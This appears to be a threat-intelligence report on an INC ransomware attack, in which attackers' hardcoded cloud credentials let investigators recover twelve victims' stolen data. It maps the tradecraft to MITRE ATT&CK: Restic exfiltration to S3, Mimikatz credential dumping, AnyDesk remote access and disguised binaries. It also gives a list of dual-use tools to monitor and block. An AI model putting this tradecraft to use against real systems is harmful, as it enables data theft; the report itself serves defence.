Executive Summary

In a rare turn of events, a major operational security (OPSEC) blunder by the INC Ransomware group has led to the full recovery of stolen data for twelve U.S. companies. Cybersecurity firm Cyber Centaurs made the discovery during a forensic investigation of an attack on one of its clients. The investigators found leftover artifacts from Restic, a legitimate open-source backup tool that the gang used for data exfiltration. Crucially, the attackers hardcoded the cloud storage repository details, including access keys and passwords, into their scripts. By analyzing these artifacts, Cyber Centaurs was able to access the threat actor's reused S3-compatible storage infrastructure, where they found the encrypted data backups of a dozen different victims from sectors including healthcare, manufacturing, and technology. This incident serves as a powerful reminder that deep forensic analysis can uncover attacker mistakes and lead to positive outcomes.

Incident Timeline

1. Initial Incident: Cyber Centaurs was engaged by a client experiencing an active ransomware attack on a production SQL server by a RainINC ransomware variant.
2. Forensic Discovery: During analysis, researchers found artifacts related to the Restic backup tool. These included renamed binaries (winupdate.exe), PowerShell scripts, and configuration files with hardcoded credentials for the gang's S3-compatible storage.
3. Investigative Pivot: The team hypothesized that the INC group was reusing this exfiltration infrastructure across multiple victims for efficiency.
4. Infrastructure Access: Using the recovered credentials, the researchers lawfully accessed the attacker-controlled cloud repositories.
5. Data Recovery: Inside the storage buckets, they discovered encrypted Restic backups belonging to twelve different U.S. organizations, which were subsequently recovered.

The investigation also confirmed the use of other tools by the gang, including AnyDesk for remote access and Mimikatz for credential harvesting.

Technical Analysis

The core of this success was the attacker's poor OPSEC.

• Infrastructure Reuse: To streamline their operations, the INC gang used the same cloud storage buckets and credentials for exfiltrating data from multiple victims. This created a single point of failure.
• Hardcoded Credentials: The attackers embedded secret keys and passwords directly into their deployment scripts. This is a common but critical mistake that removes the need for investigators to crack passwords or find other ways to access the infrastructure.
• Tool Artifacts: The failure to properly clean up their tools (T1070.004 - Indicator Removal: File Deletion) left behind the crucial Restic configuration files that unraveled their operation. Even though they used Revo Uninstaller, it was not sufficient.

MITRE ATT&CK TTPs Observed

• T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage: Using Restic to back up and exfiltrate data to S3-compatible storage.
• T1059.001 - Command and Scripting Interpreter: PowerShell: Used to execute the Restic backup commands.
• T1219 - Remote Access Software: Using AnyDesk for remote control of compromised systems.
• T1003 - OS Credential Dumping: Using Mimikatz (mimik.exe) to harvest credentials.
• T1486 - Data Encrypted for Impact: The ultimate goal of the RainINC ransomware variant.

Impact Assessment

While the outcome was positive for the twelve recovered companies, the incident still highlights the severe initial impact of an INC ransomware attack:

• Significant Downtime: The initial ransomware deployment would have caused major business disruption for all victims.
• Data Exposure Risk: Before recovery, the stolen data was in the hands of a dangerous threat actor, posing a significant breach risk.
• Incident Response Costs: All affected organizations would have incurred substantial costs for forensic investigation, containment, and remediation.

This case demonstrates that even when data is exfiltrated, recovery can sometimes be possible through deep forensic investigation and by capitalizing on attacker errors.

Detection & Response

1. Monitor for Dual-Use Tools: Security teams should monitor for the execution of legitimate tools that can be used for malicious purposes, such as Restic, Rclone, AnyDesk, and iperf3. Process execution logging is key. This aligns with D3FEND's Process Analysis (D3-PA).
2. Analyze PowerShell Scripts: Scrutinize PowerShell scripts for hardcoded credentials, suspicious commands, or connections to external storage. Enable PowerShell Script Block Logging.
3. Egress Traffic Monitoring (D3-NTA): Analyze outbound network traffic for large data transfers to cloud storage providers, especially if the tools or destinations are not part of standard business operations.
4. Thorough Forensics: This case proves the value of not stopping an investigation at containment. A deep-dive forensic analysis of attacker artifacts can yield intelligence that benefits both the victim and the wider community.

Mitigation Recommendations

1. Application Allow-listing (M1038 - Execution Prevention): Implement strict application control policies to prevent unauthorized software like Restic, AnyDesk, and other dual-use tools from running in the environment.
2. Egress Filtering (M1037 - Filter Network Traffic): Block outbound connections to non-approved cloud storage services at the network perimeter.
3. PowerShell Hardening: Configure PowerShell to run in Constrained Language Mode where possible and enable comprehensive logging (Script Block Logging, Module Logging, Transcription) to capture attacker activity.
4. Credential Protection (M1043 - Credential Access Protection): Use technologies like Windows Defender Credential Guard to protect LSASS and prevent credential dumping by tools like Mimikatz.